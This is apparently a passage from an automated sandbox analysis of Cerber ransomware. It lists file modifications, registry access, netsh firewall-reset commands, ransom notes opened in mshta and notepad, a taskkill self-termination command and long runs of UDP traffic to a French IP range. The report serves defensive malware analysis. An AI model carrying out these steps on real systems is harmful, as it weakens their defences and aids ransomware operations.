File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\ C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\documents C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\NOTEPAD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1884 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 1884 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 1884 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 1884 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 1884 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 1884 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 1884 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 1884 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 1884 wrote to memory of 2256 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 1884 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 1884 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 1884 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 1884 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 1884 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 1884 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 3808 wrote to memory of 1560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3808 wrote to memory of 1560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3808 wrote to memory of 1560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3808 wrote to memory of 4708 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3808 wrote to memory of 4708 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3808 wrote to memory of 4708 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\cerber.exe

"C:\Users\Admin\AppData\Local\Temp\cerber.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall set allprofiles state on

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall reset

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___BX5W4_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___SJ14KV_.txt

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im "cerber.exe"

C:\Windows\SysWOW64\PING.EXE

ping -n 1 127.0.0.1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 98.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
FR 178.33.158.0:6893 udp
FR 178.33.158.1:6893 udp
FR 178.33.158.2:6893 udp
FR 178.33.158.3:6893 udp
FR 178.33.158.4:6893 udp
FR 178.33.158.5:6893 udp
FR 178.33.158.6:6893 udp
FR 178.33.158.7:6893 udp
FR 178.33.158.8:6893 udp
FR 178.33.158.9:6893 udp
FR 178.33.158.10:6893 udp
FR 178.33.158.11:6893 udp
FR 178.33.158.12:6893 udp
FR 178.33.158.13:6893 udp
FR 178.33.158.14:6893 udp
FR 178.33.158.15:6893 udp
FR 178.33.158.16:6893 udp
FR 178.33.158.17:6893 udp
FR 178.33.158.18:6893 udp
FR 178.33.158.19:6893 udp
FR 178.33.158.20:6893 udp
FR 178.33.158.21:6893 udp
FR 178.33.158.22:6893 udp
FR 178.33.158.23:6893 udp
FR 178.33.158.24:6893 udp
FR 178.33.158.25:6893 udp
FR 178.33.158.26:6893 udp
FR 178.33.158.27:6893 udp
FR 178.33.158.28:6893 udp
FR 178.33.158.29:6893 udp
FR 178.33.158.30:6893 udp
FR 178.33.158.31:6893 udp
FR 178.33.159.0:6893 udp
FR 178.33.159.1:6893 udp
FR 178.33.159.2:6893 udp
FR 178.33.159.3:6893 udp
FR 178.33.159.4:6893 udp
FR 178.33.159.5:6893 udp
FR 178.33.159.6:6893 udp
FR 178.33.159.7:6893 udp
FR 178.33.159.8:6893 udp
FR 178.33.159.9:6893 udp
FR 178.33.159.10:6893 udp
FR 178.33.159.11:6893 udp
FR 178.33.159.12:6893 udp
FR 178.33.159.13:6893 udp
FR 178.33.159.14:6893 udp
FR 178.33.159.15:6893 udp
FR 178.33.159.16:6893 udp
FR 178.33.159.17:6893 udp
FR 178.33.159.18:6893 udp
FR 178.33.159.19:6893 udp
FR 178.33.159.20:6893 udp
FR 178.33.159.21:6893 udp
FR 178.33.159.22:6893 udp
FR 178.33.159.23:6893 udp
FR 178.33.159.24:6893 udp
FR 178.33.159.25:6893 udp
FR 178.33.159.26:6893 udp
FR 178.33.159.27:6893 udp
FR 178.33.159.28:6893 udp
FR 178.33.159.29:6893 udp
FR 178.33.159.30:6893 udp
FR 178.33.159.31:6893 udp
FR 178.33.160.0:6893 udp
FR 178.33.160.1:6893 udp
FR 178.33.160.2:6893 udp
FR 178.33.160.3:6893 udp
FR 178.33.160.4:6893 udp
FR 178.33.160.5:6893 udp
FR 178.33.160.6:6893 udp
FR 178.33.160.7:6893 udp
FR 178.33.160.8:6893 udp
FR 178.33.160.9:6893 udp
FR 178.33.160.10:6893 udp
FR 178.33.160.11:6893 udp
FR 178.33.160.12:6893 udp
FR 178.33.160.13:6893 udp
FR 178.33.160.14:6893 udp
FR 178.33.160.15:6893 udp
FR 178.33.160.16:6893 udp
FR 178.33.160.17:6893 udp
FR 178.33.160.18:6893 udp
FR 178.33.160.19:6893 udp
FR 178.33.160.20:6893 udp
FR 178.33.160.21:6893 udp
FR 178.33.160.22:6893 udp
FR 178.33.160.23:6893 udp
FR 178.33.160.24:6893 udp
FR 178.33.160.25:6893 udp
FR 178.33.160.26:6893 udp
FR 178.33.160.27:6893 udp
FR 178.33.160.28:6893 udp
FR 178.33.160.29:6893 udp
FR 178.33.160.30:6893 udp
FR 178.33.160.31:6893 udp
FR 178.33.160.32:6893 udp
FR 178.33.160.33:6893 udp
FR 178.33.160.34:6893 udp
FR 178.33.160.35:6893 udp
FR 178.33.160.36:6893 udp
FR 178.33.160.37:6893 udp
FR 178.33.160.38:6893 udp
FR 178.33.160.39:6893 udp
FR 178.33.160.40:6893 udp
FR 178.33.160.41:6893 udp
FR 178.33.160.42:6893 udp
FR 178.33.160.43:6893 udp
FR 178.33.160.44:6893 udp
FR 178.33.160.45:6893 udp
FR 178.33.160.46:6893 udp
FR 178.33.160.47:6893 udp
FR 178.33.160.48:6893 udp
FR 178.33.160.49:6893 udp
FR 178.33.160.50:6893 udp
FR 178.33.160.51:6893 udp
FR 178.33.160.52:6893 udp
FR 178.33.160.53:6893 udp
FR 178.33.160.54:6893 udp
FR 178.33.160.55:6893 udp
FR 178.33.160.56:6893 udp
FR 178.33.160.57:6893 udp
FR 178.33.160.58:6893 udp
FR 178.33.160.59:6893 udp
FR 178.33.160.60:6893 udp
FR 178.33.160.61:6893 udp
FR 178.33.160.62:6893 udp
FR 178.33.160.63:6893 udp
FR 178.33.160.64:6893 udp
FR 178.33.160.65:6893 udp
FR 178.33.160.66:6893 udp
FR 178.33.160.67:6893 udp
FR 178.33.160.68:6893 udp
FR 178.33.160.69:6893 udp
FR 178.33.160.70:6893 udp
FR 178.33.160.71:6893 udp
FR 178.33.160.72:6893 udp
FR 178.33.160.73:6893 udp
FR 178.33.160.74:6893 udp
FR 178.33.160.75:6893 udp
FR 178.33.160.76:6893 udp
FR 178.33.160.77:6893 udp
FR 178.33.160.78:6893 udp
FR 178.33.160.79:6893 udp
FR 178.33.160.80:6893 udp
FR 178.33.160.81:6893 udp
FR 178.33.160.82:6893 udp
FR 178.33.160.83:6893 udp
FR 178.33.160.84:6893 udp
FR 178.33.160.85:6893 udp
FR 178.33.160.86:6893 udp
FR 178.33.160.87:6893 udp
FR 178.33.160.88:6893 udp
FR 178.33.160.89:6893 udp
FR 178.33.160.90:6893 udp
FR 178.33.160.91:6893 udp
FR 178.33.160.92:6893 udp
FR 178.33.160.93:6893 udp
FR 178.33.160.94:6893 udp
FR 178.33.160.95:6893 udp
FR 178.33.160.96:6893 udp
FR 178.33.160.97:6893 udp
FR 178.33.160.98:6893 udp
FR 178.33.160.99:6893 udp
FR 178.33.160.100:6893 udp
FR 178.33.160.101:6893 udp
FR 178.33.160.102:6893 udp
FR 178.33.160.103:6893 udp
FR 178.33.160.104:6893 udp
FR 178.33.160.105:6893 udp
FR 178.33.160.106:6893 udp
FR 178.33.160.107:6893 udp
FR 178.33.160.108:6893 udp
FR 178.33.160.109:6893 udp
FR 178.33.160.110:6893 udp
FR 178.33.160.111:6893 udp
FR 178.33.160.112:6893 udp
FR 178.33.160.113:6893 udp
FR 178.33.160.114:6893 udp
FR 178.33.160.115:6893 udp
FR 178.33.160.116:6893 udp
FR 178.33.160.117:6893 udp
FR 178.33.160.118:6893 udp
FR 178.33.160.119:6893 udp
FR 178.33.160.120:6893 udp
FR 178.33.160.121:6893 udp
FR 178.33.160.122:6893 udp
FR 178.33.160.123:6893 udp
FR 178.33.160.124:6893 udp
FR 178.33.160.125:6893 udp
FR 178.33.160.126:6893 udp
FR 178.33.160.127:6893 udp
FR 178.33.160.128:6893 udp
FR 178.33.160.129:6893 udp
FR 178.33.160.130:6893 udp
FR 178.33.160.131:6893 udp
FR 178.33.160.132:6893 udp
FR 178.33.160.133:6893 udp
FR 178.33.160.134:6893 udp
FR 178.33.160.135:6893 udp
FR 178.33.160.136:6893 udp
FR 178.33.160.137:6893 udp
FR 178.33.160.138:6893 udp
FR 178.33.160.139:6893 udp
FR 178.33.160.140:6893 udp
FR 178.33.160.141:6893 udp
FR 178.33.160.142:6893 udp
FR 178.33.160.143:6893 udp
FR 178.33.160.144:6893 udp
FR 178.33.160.145:6893 udp
FR 178.33.160.146:6893 udp
FR 178.33.160.147:6893 udp
FR 178.33.160.148:6893 udp
FR 178.33.160.149:6893 udp
FR 178.33.160.150:6893 udp
FR 178.33.160.151:6893 udp
FR 178.33.160.152:6893 udp
FR 178.33.160.153:6893 udp
FR 178.33.160.154:6893 udp
FR 178.33.160.155:6893 udp
FR 178.33.160.156:6893 udp
FR 178.33.160.157:6893 udp
FR 178.33.160.158:6893 udp
FR 178.33.160.159:6893 udp
FR 178.33.160.160:6893 udp
FR 178.33.160.161:6893 udp
FR 178.33.160.162:6893 udp
FR 178.33.160.163:6893 udp
FR 178.33.160.164:6893 udp
FR 178.33.160.165:6893 udp
FR 178.33.160.166:6893 udp
FR 178.33.160.167:6893 udp
FR 178.33.160.168:6893 udp
FR 178.33.160.169:6893 udp
FR 178.33.160.170:6893 udp
FR 178.33.160.171:6893 udp
FR 178.33.160.172:6893 udp
FR 178.33.160.173:6893 udp
FR 178.33.160.174:6893 udp
FR 178.33.160.175:6893 udp
FR 178.33.160.176:6893 udp
FR 178.33.160.177:6893 udp
FR 178.33.160.178:6893 udp
FR 178.33.160.179:6893 udp
FR 178.33.160.180:6893 udp
FR 178.33.160.181:6893 udp
FR 178.33.160.182:6893 udp
FR 178.33.160.183:6893 udp
FR 178.33.160.184:6893 udp
FR 178.33.160.185:6893 udp
FR 178.33.160.186:6893 udp
FR 178.33.160.187:6893 udp
FR 178.33.160.188:6893 udp
FR 178.33.160.189:6893 udp
FR 178.33.160.190:6893 udp
FR 178.33.160.191:6893 udp
FR 178.33.160.192:6893 udp
FR 178.33.160.193:6893 udp
FR 178.33.160.194:6893 udp
FR 178.33.160.195:6893 udp
FR 178.33.160.196:6893 udp
FR 178.33.160.197:6893 udp
FR 178.33.160.198:6893 udp
FR 178.33.160.199:6893 udp
FR 178.33.160.200:6893 udp
FR 178.33.160.201:6893 udp
FR 178.33.160.202:6893 udp
FR 178.33.160.203:6893 udp
FR 178.33.160.204:6893 udp
FR 178.33.160.205:6893 udp
FR 178.33.160.206:6893 udp
FR 178.33.160.207:6893 udp
FR 178.33.160.208:6893 udp
FR 178.33.160.209:6893 udp
FR 178.33.160.210:6893 udp
FR 178.33.160.211:6893 udp
FR 178.33.160.212:6893 udp
FR 178.33.160.213:6893 udp
FR 178.33.160.214:6893 udp
FR 178.33.160.215:6893 udp
FR 178.33.160.216:6893 udp
FR 178.33.160.217:6893 udp
FR 178.33.160.218:6893 udp
FR 178.33.160.219:6893 udp
FR 178.33.160.220:6893 udp
FR 178.33.160.221:6893 udp
FR 178.33.160.222:6893 udp
FR 178.33.160.223:6893 udp
FR 178.33.160.224:6893 udp
FR 178.33.160.225:6893 udp
FR 178.33.160.226:6893 udp
FR 178.33.160.227:6893 udp
FR 178.33.160.228:6893 udp
FR 178.33.160.229:6893 udp
FR 178.33.160.230:6893 udp
FR 178.33.160.231:6893 udp
FR 178.33.160.232:6893 udp
FR 178.33.160.233:6893 udp
FR 178.33.160.234:6893 udp
FR 178.33.160.235:6893 udp
FR 178.33.160.236:6893 udp
FR 178.33.160.237:6893 udp
FR 178.33.160.238:6893 udp
FR 178.33.160.239:6893 udp
FR 178.33.160.240:6893 udp
FR 178.33.160.241:6893 udp
FR 178.33.160.242:6893 udp
FR 178.33.160.243:6893 udp
FR 178.33.160.244:6893 udp
FR 178.33.160.245:6893 udp
FR 178.33.160.246:6893 udp
FR 178.33.160.247:6893 udp
FR 178.33.160.248:6893 udp
FR 178.33.160.249:6893 udp
FR 178.33.160.250:6893 udp
FR 178.33.160.251:6893 udp
FR 178.33.160.252:6893 udp
FR 178.33.160.253:6893 udp
FR 178.33.160.254:6893 udp
US 8.8.8.8:53 0.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 2.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 1.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 4.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 3.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 5.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 6.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 7.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 8.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 9.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 10.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 11.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 12.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 13.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 14.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 15.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 16.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 17.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 18.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 19.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 20.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 21.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 22.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 24.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 23.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 25.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 26.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 27.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 28.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 31.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 30.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 29.158.33.178.in-addr.arpa udp
US 8.8.8.8:53 0.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 1.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 2.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 3.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 5.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 4.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 7.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 6.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 8.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 9.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 10.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 11.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 12.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 13.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 14.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 15.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 16.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 17.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 18.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 19.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 20.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 21.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 22.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 23.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 24.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 25.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 26.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 27.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 28.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 29.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 30.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 31.159.33.178.in-addr.arpa udp
US 8.8.8.8:53 0.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 1.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 2.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 3.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 5.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 4.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 6.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 7.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 8.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 9.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 10.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 11.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 12.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 13.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 14.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 15.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 16.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 17.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 18.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 19.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 20.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 21.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 22.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 23.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 24.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 25.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 26.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 27.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 28.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 29.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 30.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 31.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 33.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 32.160.33.178.in-addr.arpa udp
US 8.8.8.8:53 34.160.33.178.in-addr.arpa udp
